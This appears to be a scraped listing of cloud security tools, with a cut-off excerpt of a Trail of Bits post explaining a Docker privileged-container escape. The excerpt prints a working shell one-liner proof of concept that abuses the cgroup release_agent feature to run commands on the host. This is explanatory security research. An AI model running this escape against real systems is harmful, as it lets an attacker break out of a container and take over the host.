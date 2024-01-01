A project that sets up partitioned Athena tables for CloudTrail logs and updates partitions nightly.
Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes. Felix’s tweet shows an exploit that launches a process on the host from within a Docker container run with the --privileged flag. The PoC achieves this by abusing the Linux cgroup v1 “notification on release” feature. Here’s a version of the PoC that launches ps on the host: # spawn a new container to exploit via: # docker run --rm -it --privileged ubuntu bash d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh ps >'"$t/o" >/c; chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o The --privileged flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and
A tool to find S3 buckets from HTML, JS, and bucket misconfiguration testing
A Python script that lists all main resources of your AWS account, helping you find resources that affect billing and/or security.
Cloudmarker is a cloud monitoring tool and framework that audits Azure and GCP cloud environments.
A free training course and lab environment for learning to test and attack cloud infrastructure, including AWS and Azure.
AWS serverless cloud security tool for parsing and alerting on CloudTrail logs using EQL.